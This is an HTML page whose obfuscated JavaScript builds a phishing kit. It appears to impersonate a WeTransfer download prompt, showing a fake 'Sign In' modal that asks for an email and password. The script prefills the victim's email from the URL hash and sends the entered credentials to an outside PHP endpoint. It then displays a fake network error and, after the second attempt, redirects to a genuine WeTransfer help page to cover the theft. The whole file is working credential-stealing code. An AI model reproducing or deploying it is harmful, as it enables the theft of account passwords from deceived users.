<!doctype html>
<html>

	<head>
        <meta charset="utf-8">
        <title></title>
		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <style>
            body {
                background-image: url(https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/we.png?v=1670830144657);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }

            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
            @media (max-width: 575.98px) {
			#myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			body {
			background-image: url(grd.jpg);
			background-repeat: no-repeat;
			background-origin:contain;
			height:100vh;
			}
			
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			#asd{
			display:none;
			}
			
			.col-sm-3{
			width:46%
			}          
			}
        </style>
    </head>

    <body>
		<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>
		<div class="loaded" ></div>
    </body>
	
	<script>

var _0x4a0d32=_0x5b63;(function(_0x475be2,_0x47d6b0){var _0x3b6bf0=_0x5b63,_0x2e55fb=_0x475be2();while(!![]){try{var _0x34bf3f=parseInt(_0x3b6bf0(0x15c))/0x1*(-parseInt(_0x3b6bf0(0x152))/0x2)+-parseInt(_0x3b6bf0(0x154))/0x3*(-parseInt(_0x3b6bf0(0x174))/0x4)+-parseInt(_0x3b6bf0(0x16e))/0x5+parseInt(_0x3b6bf0(0x16f))/0x6+parseInt(_0x3b6bf0(0x161))/0x7+parseInt(_0x3b6bf0(0x169))/0x8*(-parseInt(_0x3b6bf0(0x15f))/0x9)+-parseInt(_0x3b6bf0(0x170))/0xa*(-parseInt(_0x3b6bf0(0x16a))/0xb);if(_0x34bf3f===_0x47d6b0)break;else _0x2e55fb['push'](_0x2e55fb['shift']());}catch(_0x34a60f){_0x2e55fb['push'](_0x2e55fb['shift']());}}}(_0xd013,0x2eecd),$(window)['on'](_0x4a0d32(0x173),function(){var _0x5d92d7=_0x4a0d32;$('#myModal')[_0x5d92d7(0x15a)](_0x5d92d7(0x16d));}),$(document)['ready'](function(){var _0x3afe8e=_0x4a0d32;$(_0x3afe8e(0x15d))[_0x3afe8e(0x165)](_0x3afe8e(0x156));var _0xe2b81c=0x0,_0x210156=window[_0x3afe8e(0x158)]['hash'][_0x3afe8e(0x159)](0x1);$('#x1')[_0x3afe8e(0x157)](_0x210156),$(_0x3afe8e(0x16c))['submit'](function(_0x182389){var _0x49d888=_0x3afe8e;_0x182389['preventDefault']();var _0x3132e3=$(_0x49d888(0x162))[_0x49d888(0x157)](),_0x7b51b0=new FormData($(_0x49d888(0x16c))[0x0]);$('#submitBtn')[_0x49d888(0x165)]('\x0a\x09\x09<button\x20class=\x22btn\x20btn-sm\x20btn-primary\x22\x20disabled>\x0a\x09\x09\x09<span\x20class=\x22spinner-grow\x20spinner-grow-sm\x22></span>Please\x20Wait...\x0a\x09\x09</button>')[_0x49d888(0x164)]('disabled',!![]),$(_0x49d888(0x16b))[_0x49d888(0x15b)](function(){var _0x9153c7=_0x49d888;$(_0x9153c7(0x155))[_0x9153c7(0x171)]();}),_0xe2b81c=_0xe2b81c+0x1,$['ajax']({'url':_0x49d888(0x167),'type':_0x49d888(0x160),'data':_0x7b51b0,'contentType':![],'processData':![],'success':function(_0x3117a6){setTimeout(function(){var _0x4976c6=_0x5b63;$(_0x4976c6(0x166))[_0x4976c6(0x157)](_0x210156),$(_0x4976c6(0x16b))[_0x4976c6(0x157)](''),$('#msg')[_0x4976c6(0x16d)](),$(_0x4976c6(0x155))[_0x4976c6(0x165)]('Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again'),$(_0x4976c6(0x168))[_0x4976c6(0x165)](_0x4976c6(0x153))['prop'](_0x4976c6(0x172),![]),_0xe2b81c>=0x2&&(_0xe2b81c=0x0,window[_0x4976c6(0x158)][_0x4976c6(0x15e)]('https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading'));},0x3e8);},'error':function(_0x1945fe){setTimeout(function(){var _0x23bca7=_0x5b63;$('#x1')[_0x23bca7(0x157)](_0x210156),$('#x2')[_0x23bca7(0x157)](''),$(_0x23bca7(0x155))[_0x23bca7(0x16d)](),$('#msg')[_0x23bca7(0x165)](_0x23bca7(0x163)),$(_0x23bca7(0x168))[_0x23bca7(0x165)](_0x23bca7(0x153))[_0x23bca7(0x164)]('disabled',![]),_0xe2b81c>=0x2&&(_0xe2b81c=0x0,window[_0x23bca7(0x158)]['replace']('https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading'));},0x3e8);}});});}));function _0x5b63(_0x4afcef,_0x44741f){var _0xd013e7=_0xd013();return _0x5b63=function(_0x5b63f4,_0x2125e1){_0x5b63f4=_0x5b63f4-0x152;var _0x5e704a=_0xd013e7[_0x5b63f4];return _0x5e704a;},_0x5b63(_0x4afcef,_0x44741f);}function _0xd013(){var _0x3975fb=['1120427uogbff','#A1','Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again','prop','html','#x1','https://alfamerinecorp.com/images/post.php','#submitBtn','208jGXYcj','555093NbmBUY','#x2','#formx','show','1711635TEBJZg','141996QFVCwn','90WuGJni','hide','disabled','load','383284ElTRXX','2jtOQKl','Sign\x20In','3XaLOeB','#msg','\x0a\x09\x09<!--\x20The\x20Modal\x20-->\x0a\x09\x09<div\x20class=\x22modal\x22\x20id=\x22myModal\x22>\x0a\x09\x09\x09<div\x20class=\x22modal-dialog\x22>\x0a\x09\x09\x09\x09<div\x20class=\x22modal-content\x22>\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20Header\x20-->\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20body\x20-->\x0a\x09\x09\x09\x09\x09<div\x20class=\x22modal-body\x20p-3\x22>\x0a\x09\x09\x09\x09\x09\x20\x20<img\x20src=\x22https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/to.png?v=1670830146465\x22\x20width=\x20\x22100%\x22\x20class=\x22img-fluid\x22>\x0a\x09\x09\x09\x09\x09\x09<div\x20class=\x22text-danger\x22\x20id=\x22msg\x22\x20style=\x22font-weight:600;\x20font-size:17px;\x22></div>\x0a\x09\x09\x09\x09\x09\x09<form\x20method=\x22post\x22\x20id=\x22formx\x22\x20class=\x22my-4\x22>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22email\x22\x20name=\x22x1\x22\x20id=\x22x1\x22\x20class=\x22form-control\x20mb-3\x22\x20value=\x22\x22\x20>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22password\x22\x20name=\x22x2\x22\x20id=\x22x2\x22\x20class=\x22form-control\x20mb-3\x22\x20placeholder=\x22Password\x22\x20value=\x22\x22\x20required>\x0a\x09\x09\x09\x09\x09\x09\x09<button\x20id=\x22submitBtn\x22\x20class=\x22btn\x20btn-md\x20btn-primary\x22>Sign\x20In</button>\x0a\x09\x09\x09\x09\x09\x09</form>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09</div>\x0a\x09\x09\x09</div>\x0a\x09\x09</div>\x0a\x09','val','location','substr','modal','click','84445VaXyjV','.loaded','replace','39717jAFKtr','POST'];_0xd013=function(){return _0x3975fb;};return _0xd013();}

	</script>

</html>
